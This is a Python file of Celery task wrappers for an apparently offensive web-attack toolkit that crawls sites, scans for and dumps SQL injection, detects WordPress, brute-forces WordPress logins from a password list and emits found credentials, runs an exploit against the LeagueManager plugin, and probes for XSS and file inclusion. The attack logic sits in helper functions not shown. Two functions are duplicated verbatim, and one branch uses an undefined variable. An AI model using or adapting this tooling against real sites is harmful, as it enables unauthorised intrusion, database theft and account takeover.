def scrape_links(link, browser_args, job_name, out_name, depth,
                 include_external, match, past=None):
    """Crawl *link*, fan out one sub-task per found URL while *depth*
    remains, and emit URLs (filtered by *match* substrings) to the output
    task.

    *past* is the shared visited-set Bloom filter; a fresh (or empty) one
    is created on the first hop, sized to the requested crawl depth.
    """
    if not past:
        # First hop: size the filter to the expected crawl volume at this depth.
        past = BloomFilter(capacity=3 * 10 ** (depth + 3), error_rate=0.001)
    found = base_link_scraper(link, browser_args, past, include_external)
    if not found:
        return
    if depth:
        # Recurse one level shallower over every URL just discovered,
        # preserving this task's routing info.
        tail = (browser_args, job_name, out_name, depth - 1,
                include_external, match)
        group(
            scrape_links.subtask((url,) + tail, {'past': past},
                                 **scrape_links.request.delivery_info)
            for url in found
        )()
    if match:
        # Keep only URLs containing at least one match substring.
        found = [url for url in found if any(token in url for token in match)]
    if found:
        celery_output.delay(found, name, job_name, out_name)
def sqli_dump(num, browser_args, job_name, out_name, url, ident, left,
              right, attempts):
    """Attempt a SQL-injection dump of row *num* from *url*.

    A string result is a successful dump and is emitted to the output
    task; otherwise the task re-queues itself with one fewer attempt
    until *attempts* is exhausted.
    """
    out = base_sqli_dump(num, browser_args, url, ident, left, right, attempts)
    if isinstance(out, str):
        # Success: record the dumped value and stop retrying.
        celery_output.delay(out, name, job_name, out_name)
        return
    if attempts - 1:
        # BUG FIX: the retry previously dispatched base_sqli_dump.delay with
        # this task's 9-arg signature (including job_name/out_name), which
        # base_sqli_dump does not accept — it must re-queue *this* task.
        sqli_dump.delay(num, browser_args, job_name, out_name, url, ident,
                        left, right, attempts - 1)
def scan_wp(url, browser_args, job_name, out_name, first=True):
    """Scan *url* for WordPress; on a miss during the first pass, fan out
    one sub-task per link returned by base_find_wp (second pass only).

    NOTE(review): this file defines scan_wp twice; at import time the
    later definition wins.
    """
    result = base_scan_wp(url, browser_args)
    if result:
        celery_output.delay(result, name, job_name, out_name)
        return
    if not first:
        return
    # First pass missed: schedule a non-recursing scan of each WP link.
    tail = (browser_args, job_name, out_name)
    group(
        scan_wp.subtask((wp_link,) + tail, {'first': False},
                        **scan_wp.request.delivery_info)
        for wp_link in base_find_wp(url)
    )()
def check_keyword(link, browser_args, job_name, out_name, keywords,
                  check_url=False):
    """Emit whatever base_check_keyword finds in *link* for *keywords*
    (optionally also matching against the URL itself)."""
    result = base_check_keyword(link, browser_args, keywords, check_url)
    if not result:
        return
    celery_output.delay(result, name, job_name, out_name)
def scan_wp(url, browser_args, job_name, out_name, first=True):
    """Scan *url* for WordPress; on a miss during the first pass, fan out
    one sub-task per link returned by base_find_wp (second pass only).

    NOTE(review): duplicate of an earlier scan_wp definition in this file;
    this later one is the definition that survives import.
    """
    result = base_scan_wp(url, browser_args)
    if result:
        celery_output.delay(result, name, job_name, out_name)
        return
    if not first:
        return
    # First pass missed: schedule a non-recursing scan of each WP link.
    tail = (browser_args, job_name, out_name)
    group(
        scan_wp.subtask((wp_link,) + tail, {'first': False},
                        **scan_wp.request.delivery_info)
        for wp_link in base_find_wp(url)
    )()
def wp_init(url, browser_args, job_name, out_name):
    # Probe a WordPress login: build login params, POST them to *url*, and
    # dispatch follow-up work based on markers in the response body.
    params = base_wp_init(url, browser_args)
    b = Browser(name, **browser_args)
    r = b.go(url, data=params)
    if WP_GDKEY in r.text:
        # NOTE(review): `out` is not defined anywhere in this function, so
        # this branch raises NameError at runtime. Possibly meant
        # out_format(url, params) or the response text — confirm against
        # out_format's other callers before fixing.
        celery_output.delay(out_format(out, params), name, job_name, out_name)
    elif WP_BUSER in r.text:
        # Bad-user marker: hand off to user enumeration.
        wp_user.delay(url, browser_args, job_name, out_name, params)
    else:
        # Otherwise start the password brute-force chain at index 1.
        wp_brute.delay(url, browser_args, job_name, out_name, params, 1)
def wp_brute(url, browser_args, job_name, out_name, params, pnum=0):
    """Try one password from wp_brute.plist against *url*, chaining the next.

    pnum == 0 tries *params* as given; pnum >= 1 substitutes
    plist[pnum - 1] as 'pwd'. On success the formatted credentials are
    emitted and the chain stops.
    """
    if pnum:
        params['pwd'] = wp_brute.plist[pnum - 1]
    out = base_wp_brute(url, browser_args, params)
    if out:
        return celery_output.delay(out_format(out, params), name, job_name,
                                   out_name)
    # BUG FIX: was `pnum <= wp_brute.plen`, which chains one task past the
    # end of the list so the final call indexes plist[plen] -> IndexError.
    # Assumes plen == len(plist) — confirm where plen is assigned.
    if pnum < wp_brute.plen:
        wp_brute.delay(url, browser_args, job_name, out_name, params, pnum + 1)
def wp_brute(url, browser_args, job_name, out_name, params, pnum=0):
    """Try one password from wp_brute.plist against *url*, chaining the next.

    pnum == 0 tries *params* as given; pnum >= 1 substitutes
    plist[pnum - 1] as 'pwd'. On success the formatted credentials are
    emitted and the chain stops.

    NOTE(review): duplicate of an earlier wp_brute definition in this
    file; this later one survives import.
    """
    if pnum:
        params['pwd'] = wp_brute.plist[pnum - 1]
    out = base_wp_brute(url, browser_args, params)
    if out:
        return celery_output.delay(out_format(out, params), name, job_name,
                                   out_name)
    # BUG FIX: was `pnum <= wp_brute.plen`, which chains one task past the
    # end of the list so the final call indexes plist[plen] -> IndexError.
    # Assumes plen == len(plist) — confirm where plen is assigned.
    if pnum < wp_brute.plen:
        wp_brute.delay(url, browser_args, job_name, out_name, params, pnum + 1)
def scan_dom(url, browser_args, job_name, out_name):
    """Run a DOM scan on *url* and emit '<url> ||| <matches>' on any hit."""
    hits = base_scan_dom(url, browser_args)
    if not hits:
        return
    # Format over the concatenated template, exactly as before.
    template = url + ' ||| {}'
    celery_output.delay(template.format(hits), name, job_name, out_name)
def scan_sqli(url, browser_args, job_name, out_name):
    """Run a SQL-injection scan on *url* and record any finding."""
    finding = base_sqli_scan(url, browser_args)
    if not finding:
        return
    celery_output.delay(finding, name, job_name, out_name)
def exploit_wp_leaguemanager(url, browser_args, job_name, out_name):
    """Run the WP LeagueManager check on *url* and record any result."""
    result = base_wp_leaguemanager(url, browser_args)
    if not result:
        return
    celery_output.delay(result, name, job_name, out_name)
def scrape_headers(link, browser_args, job_name, out_name, match):
    """Emit [link, headers] as pretty-printed JSON when *link*'s response
    headers satisfy *match*."""
    headers = base_scrape_headers(link, browser_args, match)
    if not headers:
        return
    payload = dumps([link, headers], indent=4)
    celery_output.delay(payload, name, job_name, out_name)
def check_proxy(proxy, browser_args, job_name, out_name, target_site,
                target_key):
    """Validate *proxy* against *target_site*/*target_key* and record it
    when the check succeeds."""
    result = base_check_proxy(proxy, browser_args, target_site, target_key)
    if not result:
        return
    celery_output.delay(result, name, job_name, out_name)
def test_rlfi(link, browser_args, job_name, out_name, key):
    """Probe *link* for remote/local file inclusion by searching the page
    for *key* or the 'No such file' error string."""
    result = base_check_keyword(link, browser_args, [key, 'No such file'])
    if not result:
        return
    celery_output.delay(result, name, job_name, out_name)
def scrape_proxy(link, browser_args, job_name, out_name):
    """Scrape proxy entries from *link* and record anything found."""
    proxies = base_scrape_proxy(link, browser_args)
    if not proxies:
        return
    celery_output.delay(proxies, name, job_name, out_name)
def test_xss(url, browser_args, job_name, out_name):
    """Check *url* for the reflected '<SSX>' marker and emit
    '<url> ||| <match>' when it appears."""
    reflected = base_check_keyword(url, browser_args, ['<SSX>'])
    if not reflected:
        return
    # Format over the concatenated template, exactly as before.
    template = url + ' ||| {}'
    celery_output.delay(template.format(reflected), name, job_name, out_name)